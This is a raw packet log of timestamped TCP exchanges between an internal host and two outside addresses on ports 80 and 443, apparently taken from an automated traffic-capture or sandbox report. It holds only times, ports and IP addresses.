                                                                                                                                Oct 1, 2024 09:25:22.458625078 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.458669901 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.467541933 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.540988922 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541014910 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541026115 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541065931 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541074038 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541119099 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541141987 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541141987 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541181087 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541214943 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541227102 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541238070 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541274071 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541307926 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541368008 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541384935 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541395903 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541407108 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541418076 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541428089 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541435957 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541476965 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541476965 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541604996 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541738987 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541793108 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541795015 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541805983 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541846037 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.541913033 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.541924000 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.715156078 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.715194941 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.715225935 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.715239048 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.715250015 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.715292931 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.715327978 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.715346098 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.715357065 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.715368032 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.715379000 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.715404034 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.715404034 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.715442896 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.715624094 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.715677023 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.715696096 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.715708971 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.715718985 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.715730906 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.715754032 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.715786934 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.715864897 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.715877056 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.715888023 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.715898037 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.715910912 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.715919971 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.715945005 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.715970039 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.716119051 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.716130972 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.716140985 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.716151953 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.716162920 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.716173887 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.716176033 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.716185093 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.716196060 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.716216087 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.716244936 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.716398954 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.716411114 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.716445923 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.716476917 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.716557980 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.716569901 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.716579914 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.716590881 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.716602087 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.716613054 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.716614008 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.716629982 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.716640949 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.716645956 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.716653109 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.716665030 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.716674089 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.716674089 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.716694117 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.716717958 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.717003107 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.717017889 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.717030048 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.717068911 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.717068911 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.717286110 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.717297077 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.717314005 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.717329979 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.717340946 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.717346907 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.717353106 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.717365980 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.717370033 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.717375994 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.717389107 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.717390060 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.717398882 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.717410088 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.717412949 CEST8049169104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:22.717431068 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.717451096 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.717499971 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:22.733316898 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:23.533348083 CEST4916980192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:26.495131969 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:26.495217085 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:26.495270967 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:26.503782988 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:26.503806114 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:26.534087896 CEST8049167104.168.7.8192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:26.534147978 CEST4916780192.168.2.22104.168.7.8
                                                                                                                                Oct 1, 2024 09:25:26.960777998 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:26.960977077 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:26.986027002 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:26.986053944 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:26.986334085 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.038817883 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.079408884 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.194897890 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.195069075 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.195102930 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.195130110 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.195154905 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.195156097 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.195168018 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.195193052 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.195214987 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.195836067 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.195930958 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.195976019 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.195987940 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.199681044 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.199711084 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.199728966 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.199738026 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.199784040 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.210083008 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.282265902 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.282296896 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.282336950 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.282351971 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.282406092 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.282438040 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.282454967 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.282485962 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.282505989 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.282512903 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.282522917 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.282557011 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.283261061 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.283289909 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.283317089 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.283330917 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.283345938 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.283401012 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.285020113 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.285027981 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.285048008 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.285083055 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.285089016 CEST44349170185.199.111.133192.168.2.22
Oct 1, 2024 09:25:27.285125971 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.285156965 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.285181999 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.285552979 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.369399071 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.369422913 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.369535923 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.369574070 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.369627953 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.370456934 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.370482922 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.370526075 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.370548010 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.370577097 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.370577097 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.372021914 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.372045040 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.372086048 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.372109890 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.372138023 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.372138977 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.425038099 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.425064087 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.425158024 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.425178051 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.425262928 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.456605911 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.456629992 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.456680059 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.456702948 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.456728935 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.456728935 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.457283974 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.457308054 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.457345963 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.457365036 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.457391977 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.457391977 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.458152056 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.458175898 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.458211899 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.458233118 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.458256960 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.458256960 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.459053993 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.459079027 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.459141016 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.459141970 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.459158897 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.459187984 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.459733009 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.459753990 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.459796906 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.459816933 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.459842920 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.459844112 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.460565090 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.460589886 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.460625887 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.460644960 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.460673094 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.460673094 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.461334944 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.461359024 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.461391926 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.461426020 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.461456060 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.461456060 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.543129921 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.543159962 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.543315887 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.543329000 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.543354988 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.543785095 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.543800116 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.543817997 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.543826103 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.543844938 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.543853998 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.543873072 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.543879032 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.543884039 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.544298887 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.544322968 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.544348001 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.544356108 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.544368982 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.544383049 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.545011997 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.545031071 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.545068026 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.545075893 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.545085907 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.545099020 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.545443058 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.545473099 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.545492887 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.545501947 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.545530081 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.547646999 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.547672033 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.547709942 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.547717094 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.547727108 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.548187971 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.548224926 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.548240900 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.548248053 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.548257113 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.548274994 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.548291922 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.598982096 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.599014044 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.599152088 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.599152088 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.599152088 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.599168062 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.630373955 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.630402088 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.630472898 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.630481005 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.630508900 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.631083012 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.631113052 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.631129026 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.631134987 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.631182909 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.631948948 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.631975889 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.632004976 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.632009983 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.632024050 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.632755041 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.632798910 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.632858038 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.632863998 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.632869959 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.632900000 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.632910013 CEST  49170  443    192.168.2.22     185.199.111.133
Oct 1, 2024 09:25:27.632916927 CEST  443    49170  185.199.111.133  192.168.2.22
Oct 1, 2024 09:25:27.632953882 CEST  49170  443    192.168.2.22     185.199.111.133
